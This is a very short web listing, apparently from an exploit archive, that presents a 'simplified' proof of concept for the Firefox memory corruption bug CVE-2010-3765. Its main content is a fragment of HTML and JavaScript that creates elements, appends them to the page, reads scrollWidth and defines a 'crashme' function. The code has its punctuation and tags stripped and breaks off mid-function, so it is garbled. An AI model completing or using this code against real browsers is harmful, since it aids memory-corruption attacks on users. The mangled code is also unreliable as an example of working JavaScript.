Firefox Memory Corruption Proof of Concept (Simplified)
No description provided by source. Hi there, For those who still do not know .. The proof of concept that I have extracted for CVE-2010-3765 is the following: htmlbody script function Gstr var cobj=document.createElementstr; document.body.appendChildcobj; cobj.scrollWidth; function crashme...